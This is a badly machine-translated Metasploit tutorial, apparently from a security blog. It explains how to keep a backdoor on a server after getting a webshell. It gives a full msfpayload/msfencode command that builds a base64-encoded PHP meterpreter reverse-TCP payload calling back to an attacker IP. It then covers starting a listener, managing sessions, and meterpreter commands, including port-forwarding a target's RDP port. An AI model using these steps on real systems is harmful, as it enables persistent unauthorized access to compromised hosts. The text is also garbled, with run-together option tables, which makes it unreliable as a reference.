Msfpayload Rebound Shell

1, Prophase--

The situation is when we get Webshell, we want to leave our back door, this time we can use Msfpayload and msfconsole together

Start PostgreSQL Service: Service PostgreSQL start start Metasploit Services: Service Metasploit start start msfconsole:msfconsole

View database connection Status: Db_status

Generate Backdoor Files

Msfpayload php/meterpreter/reverse_tcp lhost=192.168. 133.128 lport=5555 R | Msfencode-e php/base64-t Raw-o/root/desktop/exp.php

exp.php need to add <?php?>

Attack side Start monitoring

Or

192.168. 133.128 5555

Then go to visit our backdoor file

2, we want to save the session we got to do? You must first connect to the database

Exploit-h-e <opt> The payload encoder to use. If None isspecified, ENCODER isused. Payload encoding, default usage-f force the exploit to run regardless of the value of Minimumrank. -h help Banner. -J Run in the context of a job. Running in the background-N <opt> the NOP generator to use. If None isspecified, NOP isused. -o <opt> A Comma separated list of options in var=VAL format. -P <opt> the payload to use. If None isspecified, PAYLOAD isused. -T <opt> the target index to use. If None isspecified, TARGET isused. -Z Do notInteract with the sessions after successful exploitation set up a session into the background

Sessions-h-K Terminate All sessions kill all sessions-C <opt> Run A command on the session given With-i,orAll executes a command-D <opt>Detach an interactive session-h Help Banner-I <opt> Interact with the supplied sessionIDConnection Session-K <opt> Terminate sessions by sessionID  and/orRange-L List all active sessions-q Quiet Mode-R Reset The ring buffer for the session given With-i,or All-S <opt> Run a script on the session given With-i,or All-T <opt> Set a response timeout (default: the)    -U <opt>Upgrade a Shell to a meterpreter session on many platforms-V List verbose fields

3, Meterpreter use

Core Commands Code commands=============Command Description-------                   -----------    ? Help menu view helps background backgrounds the current session save sessions to the background Bgkill K Ills a background Meterpreter script kills background Meterpreter scripts bglist Lists running background scripts list background                   Meterpreter Script Bgrun executes a meterpreter script as a background thread executes a scripted channel in a background process    Displays information about active channels show active channels close closes a channel close channels  Disable_unicode_encoding disables encoding of Unicode strings enable_unicode_encoding enables encoding of Unicode StringsExitTerminate The Meterpreter session quit Help Help menu info Displays information about a PostModuleinteract interacts with a channel IRB Drop into IRB scripting mode open RU By terminal load Load oneorMore Meterpreter extensions quit Terminate the Meterpreter session read Reads data from a channel resource run the commands stored in a file run E Xecutes a Meterpreter scriptorPostModuleUse Deprecated alias for'Load'write writes data to a channelstdapi:file system Commands file command============================Command Description-------       -----------Cat Read The contents of a file to the screens CD change directory download Downloa D A Fileordirectory edit edit a file getlwd print local working directory GETWD print working            Directory LCD change local working directory lpwd Print Local working directory LS List files mkdir make directory pwd Print working directory RM Delete the specified File rmdir Remove Directory search search for files upload upload a fileordirectorystdapi:networking Commands Network command===========================Command Description-------       -----------PORTFWD Forward a local port to a remote service port forwarding
　　 portfwd Add -l 5555 -p 3389 -R  192.168.198.129 forwarding 192.168.198.129 3389 Port to local 5555 Port                stdapi:system Commands=======================Command Description-------       -----------Execute execute a command getenv Get OneorMore environment variable values getpid get the current process identifier Getuid get the user th at the server isrunning as kill Terminate a process PS List running processes Shell Drop into a The system command shell generates a shell sysinfo Gets information about the remote system, such as OS View systems Information

Attached: A tentative study of Meterpreter

Msfpayload Rebound Shell